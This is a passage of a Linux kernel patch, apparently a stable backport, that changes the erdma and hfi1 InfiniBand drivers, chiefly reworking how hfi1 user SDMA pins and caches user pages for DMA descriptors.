+ 		   qp->attrs.rq_size * RQE_SIZE))
+ 		return -EINVAL;
+ 
+@@ -628,7 +629,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	if (ret)
+ 		return ret;
+ 
+-	rq_offset = PAGE_ALIGN(qp->attrs.sq_size << SQEBB_SHIFT);
++	rq_offset = ALIGN(qp->attrs.sq_size << SQEBB_SHIFT, ERDMA_HW_PAGE_SIZE);
+ 	qp->user_qp.rq_offset = rq_offset;
+ 
+ 	ret = get_mtt_entries(qp->dev, &qp->user_qp.rq_mtt, va + rq_offset,
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 5d9a7b09ca37e..8973a081d641e 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,6 +215,7 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
++				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+@@ -737,10 +738,13 @@ int hfi1_ipoib_txreq_init(struct hfi1_ipoib_dev_priv *priv)
+ 		txq->tx_ring.shift = ilog2(tx_item_size);
+ 		txq->tx_ring.avail = hfi1_ipoib_ring_hwat(txq);
+ 		tx_ring = &txq->tx_ring;
+-		for (j = 0; j < tx_ring_size; j++)
++		for (j = 0; j < tx_ring_size; j++) {
+ 			hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr =
+ 				kzalloc_node(sizeof(*tx->sdma_hdr),
+ 					     GFP_KERNEL, priv->dd->node);
++			if (!hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr)
++				goto free_txqs;
++		}
+ 
+ 		netif_napi_add_tx(dev, &txq->napi, hfi1_ipoib_poll_tx_ring);
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 7333646021bb8..71b9ac0188875 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -126,11 +126,11 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	node = __mmu_rb_search(handler, mnode->addr, mnode->len);
+ 	if (node) {
+-		ret = -EINVAL;
++		ret = -EEXIST;
+ 		goto unlock;
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+-	list_add(&mnode->list, &handler->lru_list);
++	list_add_tail(&mnode->list, &handler->lru_list);
+ 
+ 	ret = handler->ops->insert(handler->ops_arg, mnode);
+ 	if (ret) {
+@@ -143,6 +143,19 @@ unlock:
+ 	return ret;
+ }
+ 
++/* Caller must hold handler lock */
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr, unsigned long len)
++{
++	struct mmu_rb_node *node;
++
++	trace_hfi1_mmu_rb_search(addr, len);
++	node = __mmu_int_rb_iter_first(&handler->root, addr, (addr + len) - 1);
++	if (node)
++		list_move_tail(&node->list, &handler->lru_list);
++	return node;
++}
++
+ /* Caller must hold handler lock */
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 					   unsigned long addr,
+@@ -167,32 +180,6 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node)
+-{
+-	struct mmu_rb_node *node;
+-	unsigned long flags;
+-	bool ret = false;
+-
+-	if (current->mm != handler->mn.mm)
+-		return ret;
+-
+-	spin_lock_irqsave(&handler->lock, flags);
+-	node = __mmu_rb_search(handler, addr, len);
+-	if (node) {
+-		if (node->addr == addr && node->len == len)
+-			goto unlock;
+-		__mmu_int_rb_remove(node, &handler->root);
+-		list_del(&node->list); /* remove from LRU list */
+-		ret = true;
+-	}
+-unlock:
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-	*rb_node = node;
+-	return ret;
+-}
+-
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -206,8 +193,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	INIT_LIST_HEAD(&del_list);
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+-	list_for_each_entry_safe_reverse(rbnode, ptr, &handler->lru_list,
+-					 list) {
++	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -219,36 +205,11 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	while (!list_empty(&del_list)) {
+-		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
+-		list_del(&rbnode->list);
++	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+ 		handler->ops->remove(handler->ops_arg, rbnode);
+ 	}
+ }
+ 
+-/*
+- * It is up to the caller to ensure that this function does not race with the
+- * mmu invalidate notifier which may be calling the users remove callback on
+- * 'node'.
+- */
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *node)
+-{
+-	unsigned long flags;
+-
+-	if (current->mm != handler->mn.mm)
+-		return;
+-
+-	/* Validity of handler and node pointers has been checked by caller. */
+-	trace_hfi1_mmu_rb_remove(node->addr, node->len);
+-	spin_lock_irqsave(&handler->lock, flags);
+-	__mmu_int_rb_remove(node, &handler->root);
+-	list_del(&node->list); /* remove from LRU list */
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-
+-	handler->ops->remove(handler->ops_arg, node);
+-}
+-
+ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		const struct mmu_notifier_range *range)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index 7417be2b9dc8a..ed75acdb7b839 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -52,10 +52,8 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *mnode);
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node);
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr,
++					  unsigned long len);
+ 
+ #endif /* _HFI1_MMU_RB_H */
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 8ed20392e9f0d..bb2552dd29c1e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,22 +1593,7 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	}
++	system_descriptor_complete(dd, descp);
+ }
+ 
+ /*
+@@ -3128,7 +3113,7 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+ 					 addr, tx->tlen);
+ 	}
+ 
+@@ -3167,10 +3152,12 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 			return rval;
+ 		}
+ 	}
++
+ 	/* finish the one just added */
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
++		NULL,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
+ 	tx->num_desc++;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index b023fc461bd51..95aaec14c6c28 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,6 +594,7 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
++	void *pinning_ctx,
+ 	dma_addr_t addr,
+ 	size_t len)
+ {
+@@ -612,6 +613,7 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++	desc->pinning_ctx = pinning_ctx;
+ }
+ 
+ /* helper to extend txreq */
+@@ -643,6 +645,7 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+ 	u16 len)
+@@ -652,6 +655,7 @@ static inline int _sdma_txadd_daddr(
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
++		pinning_ctx,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+@@ -672,6 +676,7 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
++ * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+@@ -687,6 +692,7 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+@@ -714,8 +720,7 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_PAGE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
+ }
+ 
+ /**
+@@ -749,7 +754,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
++				 addr, len);
+ }
+ 
+ /**
+@@ -795,8 +801,7 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_SINGLE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
+ }
+ 
+ struct iowait_work;
+@@ -1030,4 +1035,5 @@ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+ 
++void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index e262fb5c5ec61..fad946cb5e0d8 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -19,6 +19,7 @@
+ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
++	void *pinning_ctx;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/trace_mmu.h b/drivers/infiniband/hw/hfi1/trace_mmu.h
+index 187e9244fe5ed..57900ebb7702e 100644
+--- a/drivers/infiniband/hw/hfi1/trace_mmu.h
++++ b/drivers/infiniband/hw/hfi1/trace_mmu.h
+@@ -37,10 +37,6 @@ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_search,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+ 
+-DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_remove,
+-	     TP_PROTO(unsigned long addr, unsigned long len),
+-	     TP_ARGS(addr, len));
+-
+ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_mem_invalidate,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index a71c5a36cebab..ae58b48afe074 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -24,7 +24,6 @@
+ 
+ #include "hfi.h"
+ #include "sdma.h"
+-#include "mmu_rb.h"
+ #include "user_sdma.h"
+ #include "verbs.h"  /* for the headers */
+ #include "common.h" /* for struct hfi1_tid_info */
+@@ -39,11 +38,7 @@ static unsigned initial_pkt_count = 8;
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts);
+ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status);
+ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq);
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin);
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec);
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages);
++static void user_sdma_free_request(struct user_sdma_request *req);
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen);
+@@ -81,6 +76,11 @@ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.invalidate = sdma_rb_invalidate
+ };
+ 
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_remaining);
++
+ static int defer_packet_queue(
+ 	struct sdma_engine *sde,
+ 	struct iowait_work *wait,
+@@ -410,6 +410,7 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		ret = -EINVAL;
+ 		goto free_req;
+ 	}
++
+ 	/* Copy the header from the user buffer */
+ 	ret = copy_from_user(&req->hdr, iovec[idx].iov_base + sizeof(info),
+ 			     sizeof(req->hdr));
+@@ -484,9 +485,8 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		memcpy(&req->iovs[i].iov,
+ 		       iovec + idx++,
+ 		       sizeof(req->iovs[i].iov));
+-		ret = pin_vector_pages(req, &req->iovs[i]);
+-		if (ret) {
+-			req->data_iovs = i;
++		if (req->iovs[i].iov.iov_len == 0) {
++			ret = -EINVAL;
+ 			goto free_req;
+ 		}
+ 		req->data_len += req->iovs[i].iov.iov_len;
+@@ -584,7 +584,7 @@ free_req:
+ 		if (req->seqsubmitted)
+ 			wait_event(pq->busy.wait_dma,
+ 				   (req->seqcomp == req->seqsubmitted - 1));
+-		user_sdma_free_request(req, true);
++		user_sdma_free_request(req);
+ 		pq_update(pq);
+ 		set_comp_state(pq, cq, info.comp_idx, ERROR, ret);
+ 	}
+@@ -696,48 +696,6 @@ static int user_sdma_txadd_ahg(struct user_sdma_request *req,
+ 	return ret;
+ }
+ 
+-static int user_sdma_txadd(struct user_sdma_request *req,
+-			   struct user_sdma_txreq *tx,
+-			   struct user_sdma_iovec *iovec, u32 datalen,
+-			   u32 *queued_ptr, u32 *data_sent_ptr,
+-			   u64 *iov_offset_ptr)
+-{
+-	int ret;
+-	unsigned int pageidx, len;
+-	unsigned long base, offset;
+-	u64 iov_offset = *iov_offset_ptr;
+-	u32 queued = *queued_ptr, data_sent = *data_sent_ptr;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	base = (unsigned long)iovec->iov.iov_base;
+-	offset = offset_in_page(base + iovec->offset + iov_offset);
+-	pageidx = (((iovec->offset + iov_offset + base) - (base & PAGE_MASK)) >>
+-		   PAGE_SHIFT);
+-	len = offset + req->info.fragsize > PAGE_SIZE ?
+-		PAGE_SIZE - offset : req->info.fragsize;
+-	len = min((datalen - queued), len);
+-	ret = sdma_txadd_page(pq->dd, &tx->txreq, iovec->pages[pageidx],
+-			      offset, len);
+-	if (ret) {
+-		SDMA_DBG(req, "SDMA txreq add page failed %d\n", ret);
+-		return ret;
+-	}
+-	iov_offset += len;
+-	queued += len;
+-	data_sent += len;
+-	if (unlikely(queued < datalen && pageidx == iovec->npages &&
+-		     req->iov_idx < req->data_iovs - 1)) {
+-		iovec->offset += iov_offset;
+-		iovec = &req->iovs[++req->iov_idx];
+-		iov_offset = 0;
+-	}
+-
+-	*queued_ptr = queued;
+-	*data_sent_ptr = data_sent;
+-	*iov_offset_ptr = iov_offset;
+-	return ret;
+-}
+-
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ {
+ 	int ret = 0;
+@@ -769,8 +727,7 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 		maxpkts = req->info.npkts - req->seqnum;
+ 
+ 	while (npkts < maxpkts) {
+-		u32 datalen = 0, queued = 0, data_sent = 0;
+-		u64 iov_offset = 0;
++		u32 datalen = 0;
+ 
+ 		/*
+ 		 * Check whether any of the completions have come back
+@@ -863,27 +820,17 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 				goto free_txreq;
+ 		}
+ 
+-		/*
+-		 * If the request contains any data vectors, add up to
+-		 * fragsize bytes to the descriptor.
+-		 */
+-		while (queued < datalen &&
+-		       (req->sent + data_sent) < req->data_len) {
+-			ret = user_sdma_txadd(req, tx, iovec, datalen,
+-					      &queued, &data_sent, &iov_offset);
+-			if (ret)
+-				goto free_txreq;
+-		}
+-		/*
+-		 * The txreq was submitted successfully so we can update
+-		 * the counters.
+-		 */
+ 		req->koffset += datalen;
+ 		if (req_opcode(req->info.ctrl) == EXPECTED)
+ 			req->tidoffset += datalen;
+-		req->sent += data_sent;
+-		if (req->data_len)
+-			iovec->offset += iov_offset;
++		req->sent += datalen;
++		while (datalen) {
++			ret = add_system_pages_to_sdma_packet(req, tx, iovec,
++							      &datalen);
++			if (ret)
++				goto free_txreq;
++			iovec = &req->iovs[req->iov_idx];
++		}
+ 		list_add_tail(&tx->txreq.list, &req->txps);
+ 		/*
+ 		 * It is important to increment this here as it is used to
+@@ -920,133 +867,14 @@ free_tx:
+ static u32 sdma_cache_evict(struct hfi1_user_sdma_pkt_q *pq, u32 npages)
+ {
+ 	struct evict_data evict_data;
++	struct mmu_rb_handler *handler = pq->handler;
+ 
+ 	evict_data.cleared = 0;
+ 	evict_data.target = npages;
+-	hfi1_mmu_rb_evict(pq->handler, &evict_data);
++	hfi1_mmu_rb_evict(handler, &evict_data);
+ 	return evict_data.cleared;
+ }
+ 
+-static int pin_sdma_pages(struct user_sdma_request *req,
+-			  struct user_sdma_iovec *iovec,
+-			  struct sdma_mmu_node *node,
+-			  int npages)
+-{
+-	int pinned, cleared;
+-	struct page **pages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		return -ENOMEM;
+-	memcpy(pages, node->pages, node->npages * sizeof(*pages));
+-
+-	npages -= node->npages;
+-retry:
+-	if (!hfi1_can_pin_pages(pq->dd, current->mm,
+-				atomic_read(&pq->n_locked), npages)) {
+-		cleared = sdma_cache_evict(pq, npages);
+-		if (cleared >= npages)
+-			goto retry;
+-	}
+-	pinned = hfi1_acquire_user_pages(current->mm,
+-					 ((unsigned long)iovec->iov.iov_base +
+-					 (node->npages * PAGE_SIZE)), npages, 0,
+-					 pages + node->npages);
+-	if (pinned < 0) {
+-		kfree(pages);
+-		return pinned;
+-	}
+-	if (pinned != npages) {
+-		unpin_vector_pages(current->mm, pages, node->npages, pinned);
+-		return -EFAULT;
+-	}
+-	kfree(node->pages);
+-	node->rb.len = iovec->iov.iov_len;
+-	node->pages = pages;
+-	atomic_add(pinned, &pq->n_locked);
+-	return pinned;
+-}
+-
+-static void unpin_sdma_pages(struct sdma_mmu_node *node)
+-{
+-	if (node->npages) {
+-		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
+-				   node->npages);
+-		atomic_sub(node->npages, &node->pq->n_locked);
+-	}
+-}
+-
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec)
+-{
+-	int ret = 0, pinned, npages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-	struct sdma_mmu_node *node = NULL;
+-	struct mmu_rb_node *rb_node;
+-	struct iovec *iov;
+-	bool extracted;
+-
+-	extracted =
+-		hfi1_mmu_rb_remove_unless_exact(pq->handler,
+-						(unsigned long)
+-						iovec->iov.iov_base,
+-						iovec->iov.iov_len, &rb_node);
+-	if (rb_node) {
+-		node = container_of(rb_node, struct sdma_mmu_node, rb);
+-		if (!extracted) {
+-			atomic_inc(&node->refcount);
+-			iovec->pages = node->pages;
+-			iovec->npages = node->npages;
+-			iovec->node = node;
+-			return 0;
+-		}
+-	}
+-
+-	if (!node) {
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
+-		if (!node)
+-			return -ENOMEM;
+-
+-		node->rb.addr = (unsigned long)iovec->iov.iov_base;
+-		node->pq = pq;
+-		atomic_set(&node->refcount, 0);
+-	}
+-
+-	iov = &iovec->iov;
+-	npages = num_user_pages((unsigned long)iov->iov_base, iov->iov_len);
+-	if (node->npages < npages) {
+-		pinned = pin_sdma_pages(req, iovec, node, npages);
+-		if (pinned < 0) {
+-			ret = pinned;
+-			goto bail;
+-		}
+-		node->npages += pinned;
+-		npages = node->npages;
+-	}
+-	iovec->pages = node->pages;
+-	iovec->npages = npages;
+-	iovec->node = node;
+-
+-	ret = hfi1_mmu_rb_insert(req->pq->handler, &node->rb);
+-	if (ret) {
+-		iovec->node = NULL;
+-		goto bail;
+-	}
+-	return 0;
+-bail:
+-	unpin_sdma_pages(node);
+-	kfree(node);
+-	return ret;
+-}
+-
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages)
+-{
+-	hfi1_release_user_pages(mm, pages + start, npages, false);
+-	kfree(pages);
+-}
+-
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen)
+@@ -1388,7 +1216,7 @@ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status)
+ 	if (req->seqcomp != req->info.npkts - 1)
+ 		return;
+ 
+-	user_sdma_free_request(req, false);
++	user_sdma_free_request(req);
+ 	set_comp_state(pq, cq, req->info.comp_idx, state, status);
+ 	pq_update(pq);
+ }
+@@ -1399,10 +1227,8 @@ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq)
+ 		wake_up(&pq->wait);
+ }
+ 
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
++static void user_sdma_free_request(struct user_sdma_request *req)
+ {
+-	int i;
+-
+ 	if (!list_empty(&req->txps)) {
+ 		struct sdma_txreq *t, *p;
+ 
+@@ -1415,21 +1241,6 @@ static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
+ 		}
+ 	}
+ 
+-	for (i = 0; i < req->data_iovs; i++) {
+-		struct sdma_mmu_node *node = req->iovs[i].node;
+-
+-		if (!node)
+-			continue;
+-
+-		req->iovs[i].node = NULL;
+-
+-		if (unpin)
+-			hfi1_mmu_rb_remove(req->pq->handler,
+-					   &node->rb);
+-		else
+-			atomic_dec(&node->refcount);
+-	}
+-
+ 	kfree(req->tids);
+ 	clear_bit(req->info.comp_idx, req->pq->req_in_use);
+ }
+@@ -1447,6 +1258,368 @@ static inline void set_comp_state(struct hfi1_user_sdma_pkt_q *pq,
+ 					idx, state, ret);
+ }
+ 
++static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
++			       unsigned int start, unsigned int npages)
++{
++	hfi1_release_user_pages(mm, pages + start, npages, false);
++	kfree(pages);
++}
++
++static void free_system_node(struct sdma_mmu_node *node)
++{
++	if (node->npages) {
++		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
++				   node->npages);
++		atomic_sub(node->npages, &node->pq->n_locked);
++	}
++	kfree(node);
++}
++
++static inline void acquire_node(struct sdma_mmu_node *node)
++{
++	atomic_inc(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static inline void release_node(struct mmu_rb_handler *handler,
++				struct sdma_mmu_node *node)
++{
++	atomic_dec(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
++					      unsigned long start,
++					      unsigned long end)
++{
++	struct mmu_rb_node *rb_node;
++	struct sdma_mmu_node *node;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	rb_node = hfi1_mmu_rb_get_first(handler, start, (end - start));
++	if (!rb_node) {
++		spin_unlock_irqrestore(&handler->lock, flags);
++		return NULL;
++	}
++	node = container_of(rb_node, struct sdma_mmu_node, rb);
++	acquire_node(node);
++	spin_unlock_irqrestore(&handler->lock, flags);
++
++	return node;
++}
++
++static int pin_system_pages(struct user_sdma_request *req,
++			    uintptr_t start_address, size_t length,
++			    struct sdma_mmu_node *node, int npages)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	int pinned, cleared;
++	struct page **pages;
++
++	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
++	if (!pages)
++		return -ENOMEM;
++
++retry:
++	if (!hfi1_can_pin_pages(pq->dd, current->mm, atomic_read(&pq->n_locked),
++				npages)) {
++		SDMA_DBG(req, "Evicting: nlocked %u npages %u",
++			 atomic_read(&pq->n_locked), npages);
++		cleared = sdma_cache_evict(pq, npages);
++		if (cleared >= npages)
++			goto retry;
++	}
++
++	SDMA_DBG(req, "Acquire user pages start_address %lx node->npages %u npages %u",
++		 start_address, node->npages, npages);
++	pinned = hfi1_acquire_user_pages(current->mm, start_address, npages, 0,
++					 pages);
++
++	if (pinned < 0) {
++		kfree(pages);
++		SDMA_DBG(req, "pinned %d", pinned);
++		return pinned;
++	}
++	if (pinned != npages) {
++		unpin_vector_pages(current->mm, pages, node->npages, pinned);
++		SDMA_DBG(req, "npages %u pinned %d", npages, pinned);
++		return -EFAULT;
++	}
++	node->rb.addr = start_address;
++	node->rb.len = length;
++	node->pages = pages;
++	node->npages = npages;
++	atomic_add(pinned, &pq->n_locked);
++	SDMA_DBG(req, "done. pinned %d", pinned);
++	return 0;
++}
++
++static int add_system_pinning(struct user_sdma_request *req,
++			      struct sdma_mmu_node **node_p,
++			      unsigned long start, unsigned long len)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	struct sdma_mmu_node *node;
++	int ret;
++
++	node = kzalloc(sizeof(*node), GFP_KERNEL);
++	if (!node)
++		return -ENOMEM;
++
++	node->pq = pq;
++	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
++	if (ret == 0) {
++		ret = hfi1_mmu_rb_insert(pq->handler, &node->rb);
++		if (ret)
++			free_system_node(node);
++		else
++			*node_p = node;
++
++		return ret;
++	}
++
++	kfree(node);
++	return ret;
++}
++
++static int get_system_cache_entry(struct user_sdma_request *req,
++				  struct sdma_mmu_node **node_p,
++				  size_t req_start, size_t req_len)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	u64 start = ALIGN_DOWN(req_start, PAGE_SIZE);
++	u64 end = PFN_ALIGN(req_start + req_len);
++	struct mmu_rb_handler *handler = pq->handler;
++	int ret;
++
++	if ((end - start) == 0) {
++		SDMA_DBG(req,
++			 "Request for empty cache entry req_start %lx req_len %lx start %llx end %llx",
++			 req_start, req_len, start, end);
++		return -EINVAL;
++	}
++
++	SDMA_DBG(req, "req_start %lx req_len %lu", req_start, req_len);
++
++	while (1) {
++		struct sdma_mmu_node *node =
++			find_system_node(handler, start, end);
++		u64 prepend_len = 0;
++
++		SDMA_DBG(req, "node %p start %llx end %llu", node, start, end);
++		if (!node) {
++			ret = add_system_pinning(req, node_p, start,
++						 end - start);
++			if (ret == -EEXIST) {
++				/*
++				 * Another execution context has inserted a
++				 * conflicting entry first.
++				 */
++				continue;
++			}
++			return ret;
++		}
++
++		if (node->rb.addr <= start) {
